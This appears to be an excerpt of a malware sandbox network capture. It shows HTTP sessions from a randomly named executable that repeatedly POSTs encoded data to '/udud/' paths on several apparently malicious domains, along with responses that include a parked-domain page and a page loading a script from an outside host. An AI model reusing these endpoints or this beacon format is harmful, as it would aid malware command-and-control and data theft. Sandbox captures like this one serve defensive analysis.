                                                                                                May 27, 2024 12:33:51.404983997 CEST1289INData Raw: 35 37 36 0d 0a 74 6f 70 3a 39 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77
                                                                                                Data Ascii: 576top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.c
                                                                                                May 27, 2024 12:33:51.594410896 CEST1289INData Raw: 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63
                                                                                                Data Ascii: t-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.weba576rchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.11.304986784.32.84.32807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:56.932564974 CEST742OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6c 39 58 72 58 45 59 51 6d 74 43 2b 55 5a 39 30 62 62 69 36 59 6c 51 5a 4b 56 79 4d 77 55 66 57 5a 34 4a 57 34 77 67 33 39 73 68 68 54 72 4f 69 4b 61 43 30 6f 48 31 73 45 6b 59 62 44 50 62 4c 6a 39 53 41 50 43 35 32 6e 74 57 30 69 49 67 7a 41 6c 4a 78 54 58 76 54 77 42 33 73 77 41 79 77 41 38 33 59 52 74 67 65 4c 2f 4a 6c 63 43 41 6e 38 55 32 64 51 52 6d 7a 6c 41 48 72 42 64 4f 61 4a 57 33 6f 61 70 4d 51 4d 5a 35 72 6a 47 4b 6c 37 46 66 6d 6e 76 51 50 4e 57 33 52 6a 5a 79 6b 33 6d 6d 46 66 6b 39 65 59 4e 46 33 48 72 7a 47 33 54 43 55 30 47 36 5a 79 4d 4d 39 31 54 2b 50 71 41 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=l9XrXEYQmtC+UZ90bbi6YlQZKVyMwUfWZ4JW4wg39shhTrOiKaC0oH1sEkYbDPbLj9SAPC52ntW0iIgzAlJxTXvTwB3swAywA83YRtgeL/JlcCAn8U2dQRmzlAHrBdOaJW3oapMQMZ5rjGKl7FfmnvQPNW3RjZyk3mmFfk9eYNF3HrzG3TCU0G6ZyMM91T+PqA==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                38192.168.11.304986884.32.84.32807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:59.569232941 CEST762OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6c 39 58 72 58 45 59 51 6d 74 43 2b 56 35 74 30 61 34 36 36 5a 46 51 65 47 31 79 4d 69 55 65 64 5a 34 31 57 34 78 30 6e 39 66 46 68 51 4b 2b 69 4a 59 36 30 70 48 31 73 63 55 59 55 4f 76 61 48 6a 39 65 6d 50 41 39 32 6e 73 79 30 69 49 77 7a 41 57 68 2b 52 48 75 31 32 42 33 75 76 77 79 77 41 38 33 59 52 70 77 6b 4c 37 64 6c 63 7a 77 6e 36 31 32 65 54 52 6d 79 74 67 48 72 46 64 50 79 4a 57 33 57 61 6f 51 71 4d 62 78 72 6a 43 4f 6c 37 58 6e 6c 74 76 51 4e 41 32 32 4f 75 6f 75 70 78 46 65 35 53 44 4a 73 63 65 31 72 50 63 43 63 71 51 32 57 6e 6d 47 30 75 4e 68 56 33 52 2f 55 33 46 76 4f 46 5a 47 53 6d 41 67 44 6d 5a 4c 32 53 36 52 75 76 68 30 3d
                                                                                                Data Ascii: Pl9P8ldX=l9XrXEYQmtC+V5t0a466ZFQeG1yMiUedZ41W4x0n9fFhQK+iJY60pH1scUYUOvaHj9emPA92nsy0iIwzAWh+RHu12B3uvwywA83YRpwkL7dlczwn612eTRmytgHrFdPyJW3WaoQqMbxrjCOl7XnltvQNA22OuoupxFe5SDJsce1rPcCcqQ2WnmG0uNhV3R/U3FvOFZGSmAgDmZL2S6Ruvh0=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                39192.168.11.304986984.32.84.32807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:02.209757090 CEST1679OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.noispisok.com
                                                                                                Referer: http://www.noispisok.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6c 39 58 72 58 45 59 51 6d 74 43 2b 56 35 74 30 61 34 36 36 5a 46 51 65 47 31 79 4d 69 55 65 64 5a 34 31 57 34 78 30 6e 39 66 4e 68 54 34 61 69 4c 35 36 30 7a 48 31 73 43 6b 5a 54 4f 76 62 64 6a 38 32 71 50 41 67 55 6e 75 36 30 77 37 6f 7a 47 6e 68 2b 59 48 75 31 36 68 33 7a 77 41 79 70 41 38 6e 63 52 74 55 6b 4c 37 64 6c 63 78 6f 6e 39 6b 32 65 66 78 6d 7a 6c 41 47 71 42 64 4f 66 4a 57 76 47 61 6f 45 41 4d 6f 70 72 36 69 65 6c 35 6b 66 6c 68 76 51 4c 44 32 32 47 75 6f 6a 70 78 46 53 50 53 44 55 48 63 64 6c 72 4b 4a 76 30 36 54 6d 2f 39 58 4b 37 72 38 35 2b 2b 43 61 48 35 55 6a 39 47 36 32 4f 70 79 6b 67 2b 73 2f 41 44 37 78 75 78 46 6f 44 78 44 4b 41 33 43 46 50 4d 68 39 67 31 44 41 35 52 6e 77 2f 63 6f 71 4a 6d 6c 63 69 75 34 61 58 49 6c 45 36 6a 49 57 69 44 35 45 31 4c 6d 30 6c 72 70 43 36 45 6f 63 59 54 56 61 70 2b 4d 71 52 6e 45 6e 6b 53 4b 65 31 66 71 4d 58 77 47 56 4d 66 32 46 49 35 59 69 6b 42 39 39 43 57 51 37 39 36 4a 62 42 77 39 71 68 37 62 65 73 65 73 44 44 63 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=l9XrXEYQmtC+V5t0a466ZFQeG1yMiUedZ41W4x0n9fNhT4aiL560zH1sCkZTOvbdj82qPAgUnu60w7ozGnh+YHu16h3zwAypA8ncRtUkL7dlcxon9k2efxmzlAGqBdOfJWvGaoEAMopr6iel5kflhvQLD22GuojpxFSPSDUHcdlrKJv06Tm/9XK7r85++CaH5Uj9G62Opykg+s/AD7xuxFoDxDKA3CFPMh9g1DA5Rnw/coqJmlciu4aXIlE6jIWiD5E1Lm0lrpC6EocYTVap+MqRnEnkSKe1fqMXwGVMf2FI5YikB99CWQ796JbBw9qh7besesDDcjDytBmUxUrmBnvSOoMYrOTMcw7g6KvIsmHVtNePLx8akPb8opAoNhfN6lXfHC96TuiJN+aEZYVzKLC79ZtX21hBLZazuegO3MSJAukpgXv5WCxEz5AiTn2Z+TOmGejlqQESFgnWK2wyV5u+8jAYcaZsu0aJYnE+LSwfMCcbDPMMcQuLyE4Xy0rPopmBI11KVEn0db6qMd5yqknkaYWPG2yUdwCVVzzAYiQdf5oFIjWVRLfQjwDYQPbM3NANI6N0pl3EbIDQtySYHy9ujmnghfQqIzWogAC15FrV0BYoEi5fN0VTxef2RhsugjVuV+tKsX0dMCN+aa7i/ofE/zXyVIKQejUBYf2+8qyoEVB9s6IjUMrBQ38KlsPTMEGSL9gSYhxG6kNZpgz8hmLAcUafbqBSUf1YNqfEiKm3uJD5+zGX1abNEo9h5ltD+uUtsnby2LD2wkj09HSCgj2T8iCulPQ4jf2tBruMpUP8ttx2wUSvo7OqU3I232zkgdnAY5ePOVhLWMEPmcWAsicwQeVy0B1wT2GptDNHAjhXffS2QazmebhBvUQwr/nwiDc3NABzEJ517l2xTSHxVZ1sWuIYUcWuvFq6zp7BjdjLeE5UwSX1KnzNHcSo9DMGDa43lEZO3e+SEN6YdKwQFvIE6DpXw6uQH2jPIcIoT4w [TRUNCATED]


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                40192.168.11.304987084.32.84.32807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:04.848985910 CEST478OUTGET /udud/?Pl9P8ldX=o//LU1QIruq3a+llS5WSA3MhPk/fn3r1eotnxTFa/e8OUp/jL5i10F1rY2VLIPDErdjGMTht5s2Ux60YHU9QFnGu9iPsukiHU979EPg7OqcwQWhMz0uyXSg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.noispisok.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:34:04.957856894 CEST1289INHTTP/1.1 200 OK
                                                                                                Server: hcdn
                                                                                                Date: Mon, 27 May 2024 10:34:04 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 10072
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                x-hcdn-request-id: 13b1463464eb0d7580b2fb3b46e148be-bos-edge1
                                                                                                Expires: Mon, 27 May 2024 10:34:03 GMT
                                                                                                Cache-Control: no-cache
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                May 27, 2024 12:34:04.957995892 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                May 27, 2024 12:34:04.958010912 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                May 27, 2024 12:34:04.958029985 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                May 27, 2024 12:34:04.958060980 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                May 27, 2024 12:34:04.958101988 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                May 27, 2024 12:34:04.958172083 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                May 27, 2024 12:34:04.958184958 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                May 27, 2024 12:34:04.958194971 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                41192.168.11.3049871162.209.189.152807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:10.888120890 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                42192.168.11.3049872162.209.189.152807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:13.571012974 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                43192.168.11.3049873162.209.189.152807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:16.260219097 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                44192.168.11.3049874162.209.189.152807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:18.944675922 CEST192INHTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 6f 67 65 38 6f 70 70 2e 63 6f 6d 3a 33 30 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                45192.168.11.3049875147.92.36.247807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:24.884090900 CEST733OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 45 63 2b 56 78 46 37 36 63 6d 52 52 75 38 6c 43 73 6d 5a 37 63 6e 4b 70 6b 42 69 63 47 75 66 45 64 51 53 58 2f 79 68 76 64 72 6c 4d 6e 5a 4d 54 66 46 2b 78 69 67 55 72 6e 74 70 7a 4b 6b 54 73 6e 53 48 73 4b 39 36 62 39 2f 6a 2f 33 2f 51 5a 73 61 42 2b 4f 6f 71 74 36 33 30 73 48 58 70 62 77 4a 71 43 42 58 49 6e 54 47 32 56 54 61 57 45 57 36 2b 4d 70 76 78 70 69 53 71 79 74 41 4d 51 6f 6f 65 47 7a 69 4c 2f 42 2f 36 33 6f 56 32 67 35 52 2b 4d 46 59 33 55 37 51 58 55 72 61 62 71 31 34 79 42 71 54 43 69 74 4d 52 33 39 73 30 6d 2b 70 36 63 38 45 4b 75 59 39 65 35 68 6d 76 62 33 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=Ec+VxF76cmRRu8lCsmZ7cnKpkBicGufEdQSX/yhvdrlMnZMTfF+xigUrntpzKkTsnSHsK96b9/j/3/QZsaB+Ooqt630sHXpbwJqCBXInTG2VTaWEW6+MpvxpiSqytAMQooeGziL/B/63oV2g5R+MFY3U7QXUrabq14yBqTCitMR39s0m+p6c8EKuY9e5hmvb3w==
                                                                                                May 27, 2024 12:34:25.217092037 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:25 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=cc816e0b-e34f-4ee6-bdfc-3c71c1fb4a31; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
